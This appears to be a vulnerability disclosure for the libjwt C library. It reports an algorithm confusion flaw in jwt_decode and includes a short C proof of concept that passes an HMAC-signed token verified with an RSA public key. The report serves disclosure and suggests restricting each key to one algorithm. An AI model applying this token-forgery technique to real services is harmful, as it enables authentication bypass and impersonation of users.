libjwt
libjwt copied to clipboard
Published
20 hours ago •
benmcollins
benmcollins
[Vuln] Algorithm Confusion in jwt_decode
Hello! This library has security issues with algorithm confusion. The attacker can use the RSA public key and encrypt the JWT using the HMAC algorithm to bypass the verification. poc:
#include <stdio.h>
#include <stdlib.h>
#include "jwt.h"
#include <string.h>
#include <time.h>
static const char jwt_rs256_2048[] = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.ey"
"JpYXQiOjE0NzU5ODA1NDUsImlzcyI6ImZpbGVzLm1hY2xhcmEtbGxjLmNvbSIsInJlZi"
"I6IlhYWFgtWVlZWS1aWlpaLUFBQUEtQ0NDQyIsInN1YiI6InVzZXIwIn0.RlJPQst_lp"
"MJUsbnzlT2Mf3xzlHyUlVaQM_PJ1_vpBf1gHkhv-0hm3pa1_HRvpqg5UdDF3iOMLT0GU"
"j3W8JveaSvXKFeZdRpQGqmC7MZ7NzaYtyaDT7asniIVDf0JomD8Cfq8IdOn2ZREpbuJ6"
"moPwwvJ2zwL3vY-7w5A7ZQ3fxUedPuzn9n6tbEnuXcbDMyWQjen5poYmmvoIrDbzK0Zb"
"KbAJ5VrJwME_fZnPHS4c3b8rZGdBJCPI8oT2On6a9LrVqY3riqqHeiSqewfjDsox4tL2"
"G5KUpqK0oJmnZPGTnNY774PGabpcPBNbfMJqi8o8r0a7pa7sy6B59P7slUdw";
static const char jwt_hs256[] = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIifQ.EYXTg9j6bocqrdsK4610NSPwhJLKVYmKCIytjCiIuLo";
static unsigned char key[16384];
static size_t key_len;
static void read_key(const char *key_file)
{
FILE *fp = fopen(key_file, "r");
int ret = 0;
fp = fopen(key_file, "r");
key_len = fread(key, 1, sizeof(key), fp);
fclose(fp);
key[key_len] = '\0';
}
int main() {
jwt_t *jwt = NULL;
int ret = 0;
read_key("rsa_key_2048-pub.pem");
ret = jwt_decode(&jwt, jwt_rs256_2048, key, key_len);
printf("%d\n", ret);
ret = jwt_decode(&jwt, jwt_hs256, key, key_len);
printf("%d\n", ret);
return 0;
}
For details, please refer to the following article: https://portswigger.net/web-security/jwt/algorithm-confusion How to fix: Refer to https://github.com/Thalhammer/jwt-cpp and limit each key to one algorithm. Thank you!
